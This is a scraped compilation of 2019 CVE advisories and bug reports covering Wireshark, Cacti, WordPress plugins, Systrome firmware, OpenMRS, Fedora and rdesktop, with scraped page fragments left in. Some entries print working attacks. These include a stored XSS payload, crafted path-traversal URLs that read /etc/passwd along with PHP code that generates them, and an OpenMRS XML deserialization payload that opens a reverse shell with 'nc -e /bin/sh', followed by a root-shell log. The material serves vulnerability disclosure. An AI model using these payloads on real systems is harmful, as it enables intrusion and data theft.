In Wireshark 2.4.0 to 2.4.13, 2.6.0 to 2.6.7, and 3.0.0, the LDSS dissector could crash. This was addressed in epan/dissectors/packet-ldss.c by handling file digests properly.

**Summary**

**Name:** LDSS dissector crash

**Docid:** wnpa-sec-2019-17

**Date:** April 8, 2019

**Affected versions:** 3.0.0, 2.6.0 to 2.6.7, 2.4.0 to 2.4.13

**Fixed versions:** 3.0.1, 2.6.8, 2.4.14

**References:**

Wireshark issue 15620.  
CVE-2019-10901.

**Details****Description**

The LDSS dissector could crash. Discovered by Mateusz Jurczyk.

**Impact**

It may be possible to make Wireshark crash by injecting a malformed packet onto the wire or by convincing someone to read a malformed packet trace file.

**Resolution**

Upgrade to Wireshark 3.0.1, 2.6.8, 2.4.14 or later.

CVE-2019-10901: Wireshark • wnpa-sec-2019-17 LDSS dissector crash

In clearFilter() in utilities.php in Cacti before 1.2.3, no escaping occurs before printing out the value of the SNMP community string (SNMP Options) in the View poller cache, leading to XSS.

**Describe the bug**  
There's no escape being done before printing out the value of SNMP community string (SNMP Options) in the View poller cache.

**To Reproduce**  
Steps to reproduce the behavior:

1.  Login as normal user ( should have device creation explicitly enabled ).
    
2.  Select create a new device from the console menu.
    
3.  Enter the below shared payload into the "SNMP community string" field & save the device. Payload - <script> alert('XSS'); document.location.replace('//google.com');</script>\`
    
4.  Now login as an Admin user & go to Utilities > System utils > View poller cache, XSS would be trigerred & redirected to google.com as specified in the payload. .
    

**Expected behavior**  
Proper filtration & escaping needs to be done, before taking in the data from the user.

**Screenshots**  

**Desktop (please complete the following information):**

*   OS: Ubuntu 16.04
*   Browser: Firefox

**Smartphone (please complete the following information):**

**Additional context**  
Vulnerable snippet:

Line 1849 in utilities.php  
__('Community:') . ' ' . $item['snmp_community']

CVE-2019-11025: When viewing poller cache, Device SNMP community is not properly escaped · Issue #2581 · Cacti/cacti

In the wp-google-maps plugin before 7.11.18 for WordPress, includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement.

CVE-2019-10692: WP Go Maps (formerly WP Google Maps)

CVE-2019-10692: WP Google Maps

An Information Disclosure / Data Modification issue exists in article2pdf_getfile.php in the article2pdf Wordpress plugin 0.24, 0.25, 0.26, 0.27. A URL can be constructed which allows overriding the PDF file's path leading to any PDF whose path is known and which is readable to the web server can be downloaded. The file will be deleted after download if the web server has permission to do so. For PHP versions before 5.3, any file can be read by null terminating the string left of the file extension.

Skip to content

*   When visiting the PDF download link which the original PDF generation  
    link redirects to, the file path is constructed from a combination of  
    fixed strings and the strings provided via the query string of the  
    download URL. The download URL has the form  
    http://www.example.com/wp-content/plugins/article2pdf/article2pdf\_getfile.php?p=xxx&r=yyy&d=zzz  
    where xxx is a base64 encoded absolute string, xxx is a short hex hash  
    and zzz is the base64 encoded URL title slug of the post the PDF was  
    generated from. While the plugin attempts to sanitise these input  
    parameters to not allow path traversal, this sanitisation is  
    insufficient and can be fully or partially circumvented depending on  
    the PHP version the WordPress instance is running on.
    
    In the case of PHP version <5.3 it is possible to read any file the  
    user the plugin is executed under has read access to by just encoding  
    the full file path in the parameter “d” and terminating that string  
    with a null-byte. The parameter “p” must not be empty but can contain  
    any value. The parameter “r” may be empty but its value is of no  
    significance. If the user that the script is executed as has write  
    access to the file or the directory it is stored in, the file will be  
    deleted after it has been downloaded. If the user has no write access,  
    an error message may be shown at the end of the file contents  
    offered which discloses the WordPress instance’s install directory on  
    the server.
    
    In the case of PHP version >=5.3, null-termination will no longer cut  
    off the string. As the generated file name ends with a fixed string  
    “.pdf”, only files with that file ending can be read. The parameter “d”  
    may be any directory on the server. The parameter “p” needs to contain  
    8 backspace characters to delete a prepended fixed string from the file  
    name while the parameter “r” must contain exactly one backspace. The  
    actual file name (without the “.pdf”) can then be appended to the  
    backspaces in either parameter “p” or parameter “r”. It is also  
    possible to have “p” contain one random character and then have 10  
    backspace characters followed by the actual file name (again,  
    without the “.pdf”) stored in parameter “r”.
    

*   The topic ‘PDF download path improperly sanitised’ is closed to new replies.

CVE-2019-1010257: PDF download path improperly sanitised

A disk space or quota exhaustion issue exists in article2pdf_getfile.php in the article2pdf Wordpress plugin 0.24, 0.25, 0.26, 0.27. Visiting PDF generation link but not following the redirect will leave behind a PDF file on disk which will never be deleted by the plug-in.

**Bugtraq mailing list archives**

_From_: Christian Lerrahn <cybersec () drwaryaa com>  
_Date_: Tue, 26 Mar 2019 12:31:25 +1100  

Product: article2pdf (Wordpress plug-in)
Product Website: https://wordpress.org/plugins/article2pdf/
Affected Versions: 0.24 and greater

The following vulnerabilities were found in a code review of the plug-in. An attempt to contact the plug-in maintainer on 8 December 2018 was unsuccessful. The Wordpress security team disabled downloads

of the plug-in upon notification on 8 January 2019.

I would like to thank Ken Johnson (@cktricky) and Set Law (@sethlaw) whose course "Seth & Ken's Excellent Adventures in Secure Code Review" sparked my interest in reviewing code for

vulnerabilities.

\[CVE-2019-1000031\] Generated PDF file is only removed after download which is initiated by a redirect

\=====================================================================================================
Type:
-----
Resource Exhaustion

Description:
-----------
The plugin generates a PDF version of a post/article when a link of the
form

https://www.example.com/.../my-post-title/?article2pdf=1

is visited. The response to this initial request is a redirect to a link
like

http://www.example.com/wp-content/plugins/article2pdf/article2pdf\_getfile.php?p=xxx&r=yyy&d=zzz

which will then return the PDF file contents and subsequently delete
the file.

As the deletion is coupled with the download but the download is
initiated by a different request than the one which creates the file,
visiting the link which creates the file and not following the redirect
results in the file not being deleted. These files can then accumulate
and potentially exhaust the available disk space.

Depending on the server setup, space exhaustion of a hard drive or hard
drive partition or even just a disk quota can result in denial of
service even for unrelated services on the same machine which rely on
the same resource.

This issue was originally reported on the plugin's bug tracker \[2\] but
never identified as a vulnerability.

Exploit
-------
Repeatedly visit a PDF generation link the plugin provides without ever
following the redirect to exhaust disk space.

\[CVE-2019-1010257\] PDF file download path is constructed from insufficiently sanitised user input

\=================================================================================================
Type:
-----
Information Disclosure / File Deletion

Description:
------------
When visiting the PDF download link which the original PDF generation
link redirects to, the file path is constructed from a combination of
fixed strings and the strings provided via the query string of the
download URL. The download URL has the form

http://www.example.com/wp-content/plugins/article2pdf/article2pdf\_getfile.php?p=xxx&r=yyy&d=zzz

where xxx is a base64 encoded absolute string, xxx is a short hex hash
and zzz is the base64 encoded URL title slug of the post the PDF was
generated from. While the plugin attempts to sanitise these input
parameters to not allow path traversal, this sanitisation is
insufficient and can be fully or partially circumvented depending on
the PHP version the Wordpress instance is running on.

In the case of PHP version <5.3 it is possible to read any file the
user the plugin is executed under has read access to by just encoding
the full file path in the parameter "d" and terminating that string
with a null-byte. The parameter "p" must not be empty but can contain
any value. The parameter "r" may be empty but its value is of no
significance. If the user that the script is executed as has write
access to the file or the directory it is stored in, the file will be
deleted after it has been downloaded. If the user has no write access,
an error message may be shown at the end of the file contents
offered which discloses the Wordpress instance's install directory on
the server.

In the case of PHP version >=5.3, null-termination will no longer cut
off the string. As the generated file name ends with a fixed string
".pdf", only files with that file ending can be read. The parameter "d"
may be any directory on the server. The parameter "p" needs to contain
8 backspace characters to delete a prepended fixed string from the file
name while the parameter "r" must contain exactly one backspace. The
actual file name (without the ".pdf") can then be appended to the
backspaces in either parameter "p" or parameter "r". It is also
possible to have "p" contain one random character and then have 10
backspace characters followed by the actual file name (again,
without the ".pdf") stored in parameter "r".

The information above can also be found on the plug-in's issue tracker \[3\].

Exploit:
--------
On PHP <5.3, a specially crafted link like

http://php52.example.com/wp-content/plugins/article2pdf/article2pdf\_getfile.php?p=YQ==&r=&d=L2V0Yy9wYXNzd2QA

will download the server's /etc/passwd file.

On PHP >=5.3, a specially crafted link like

http://www.example.com/wp-content/plugins/article2pdf/article2pdf\_getfile.php?p=CAgICAgICAg=&r=%08test&d=L3RtcA==

will return the contents of the file "/tmp/test.pdf" and delete the
file if the user the script is executed as has permissions to do so.

The link used above can be generated using a few lines of PHP:

    <?php
    $d52 = base64\_encode("/etc/passwd\\0");
    $p52 = base64\_encode("a");
    $r52 = "";

echo "http://www.example.com/wp-content/plugins/article2pdf/article2pdf\_getfile.php?p=${p52}&r=${r52}&d=${d52}\\n";;

    $d53 = base64\_encode("/tmp");
    $p53\_raw = "";
    for ($i=0;$i<8; $i++) $p53\_raw .= chr(8);
    $p53 = base64\_encode($p53\_raw);
    $r53 = "%08test";

echo "http://www.example.com/wp-content/plugins/article2pdf/article2pdf\_getfile.php?p=${p53}&r=${r53}&d=${d53}\\n";;

\[1\] https://wordpress.org/plugins/article2pdf/

\[2\] https://wordpress.org/support/topic/plugin-article2pdf-temporary-files-filling-up-server-space/ \[3\] https://wordpress.org/support/topic/pdf-download-path-improperly-sanitised/

**Current thread:**

*   **\[article2pdf (Wordpress plug-in)\] Multiple vulnerabilities (CVE-2019-1000031, CVE-2019-1010257)** _Christian Lerrahn (Mar 26)_

CVE-2019-1000031: [article2pdf (Wordpress plug-in)] Multiple vulnerabilities (CVE-2019-1000031, CVE-2019-1010257)

An issue was discovered on Systrome Cumilon ISG-600C, ISG-600H, and ISG-800W devices with firmware V1.1-R2.1_TRUNK-20181105.bin. A shell command injection occurs by editing the description of an ISP file. The file network/isp/isp_update_edit.php does not properly validate user input, which leads to shell command injection via the des parameter.

Privacy Statement Terms & Conditions Cookie Policy Accessibility Statement Do Not Sell My Personal Information (for CA)

© 2021 Accenture. All Rights Reserved.

CVE-2019-7383: Bugtraq

OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the targeted system via crafted XML data in a request body.

    Insecure Object Deserialization on the OpenMRS Platform
    Vulnerability Details
    CVE ID: CVE-2018-19276
    
    Access Vector: Remote
    
    Security Risk: Critical
    
    Vulnerability: CWE-502
    
    CVSS Base Score: 10.0 
    
    CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
    
    JAVA 8 ENVIRONMENT
    By injecting an XML payload in the following body request to the REST API provided by the application, an attacker could execute arbitrary commands on the remote system. The request below could be used to exploit the vulnerability:
    
    
    POST /openmrs/ws/rest/v1/xxxxxx HTTP/1.1
    Host: HOST
    Content-Type: text/xml
    
    <map>
     <entry>
       <jdk.nashorn.internal.objects.NativeString>
         <flags>0</flags>
         <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
           <dataHandler>
             <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
               <is class="javax.crypto.CipherInputStream">
                 <cipher class="javax.crypto.NullCipher">
                   <initialized>false</initialized>
                   <opmode>0</opmode>
                   <serviceIterator class="javax.imageio.spi.FilterIterator">
                     <iter class="javax.imageio.spi.FilterIterator">
                       <iter class="java.util.Collections$EmptyIterator"/>
                       <next class="java.lang.ProcessBuilder">
                         <command>
                           <string>/bin/sh</string>
                           <string>-c</string>
                           <string>nc -e /bin/sh 172.16.32.3 8000</string>
                         </command>
                         <redirectErrorStream>false</redirectErrorStream>
                       </next>
                     </iter>
                     <filter class="javax.imageio.ImageIO$ContainsFilter">
                       <method>
                         <class>java.lang.ProcessBuilder</class>
                         <name>start</name>
                         <parameter-types/>
                       </method>
                       <name>foo</name>
                     </filter>
                     <next class="string">foo</next>
                   </serviceIterator>
                   <lock/>
                 </cipher>
                 <input class="java.lang.ProcessBuilder$NullInputStream"/>
                 <ibuffer></ibuffer>
                 <done>false</done>
                 <ostart>0</ostart>
                 <ofinish>0</ofinish>
                 <closed>false</closed>
               </is>
               <consumed>false</consumed>
             </dataSource>
             <transferFlavors/>
           </dataHandler>
           <dataLen>0</dataLen>
         </value>
       </jdk.nashorn.internal.objects.NativeString>
       <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
     </entry>
     <entry>
       <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
       <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
     </entry>
    
    The payload above was generated with the marshalsec tool and adapted to use multiple arguments because the original payload would not work well if the attacker need to send several arguments to a Linux host.. After the payload was sent, the handler successfully received a response:
    
    ~ » nc -vlp 8000
    Ncat: Version 7.60 ( https://nmap.org/ncat )
    Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
    Ncat: SHA-1 fingerprint: 5DE4 9A26 3868 367D 8104 B043 CE14 BAD6 5CC9 DE51
    Ncat: Listening on :::8000
    Ncat: Listening on 0.0.0.0:8000
    Ncat: Connection from 172.16.32.2.
    Ncat: Connection from 172.16.32.2:52434.
    id
    uid=0(root) gid=0(root) groups=0(root)
    pwd
    /usr/local/tomcat
    
    
    The response should contain an error message similar to the one below:
    
    
    {"error":{"message":"[Could not read [class org.openmrs.module.webservices.rest.SimpleObject]; nested exception is org.springframework.oxm.UnmarshallingFailureException: XStream unmarshalling exception; nested exception is com.thoughtworks.xstream.converters.ConversionException: java.lang.String cannot be cast to java.security.Provider$Service
    …omitted for brevity…
    
    
    The response above showed that the REST Web Services module was unable to process the request properly. However, the payload was deserialized before it is caught by the exception handler, which allowed the team to gain shell access.

CVE-2018-19276: Offensive Security’s Exploit Database Archive

The email-ingestion feature in Best Practical Request Tracker 4.1.13 through 4.4 allows denial of service by remote attackers via an algorithmic complexity attack on email address parsing.

\-------------------------------------------------------------------------------- Fedora Update Notification FEDORA-2019-ef5551fcff 2019-02-13 06:14:17.450111 -------------------------------------------------------------------------------- Name : perl-Email-Address-List Product : Fedora 28 Version : 0.06 Release : 1.fc28 URL : https://metacpan.org/release/Email-Address-List Summary : RFC close address list parsing Description : Parser for From, To, Cc, Bcc, Reply-To, Sender and previous prefixed with Resent- (e.g. Resent-From) headers. -------------------------------------------------------------------------------- Update Information: Upstream bugfix. CVE-2018-18898 -------------------------------------------------------------------------------- ChangeLog: \* Thu Jan 31 2019 Ralf Cors��pius <corsepiu(a)fedoraproject.org&gt; - 0.06-1 - Update to 0.06. - Modernize spec. - Reflect Source0-URL having changed. -------------------------------------------------------------------------------- This update can be installed with the "dnf" update program. Use su -c 'dnf upgrade --advisory FEDORA-2019-ef5551fcff' at the command line. For more information, refer to the dnf documentation available at http://dnf.readthedocs.io/en/latest/command\_ref.html#upgrade-command-label All packages are signed with the Fedora Project GPG key. More details on the GPG keys used by the Fedora Project can be found at https://fedoraproject.org/keys --------------------------------------------------------------------------------

CVE-2018-18898: [SECURITY] Fedora 28 Update: perl-Email-Address-List-0.06-1.fc28 - package-announce

rdesktop versions up to and including v1.8.3 contain an Integer Overflow that leads to a Heap-Based Buffer Overflow in the function rdp_in_unistr() and results in memory corruption and possibly even a remote code execution.

Tag

#perl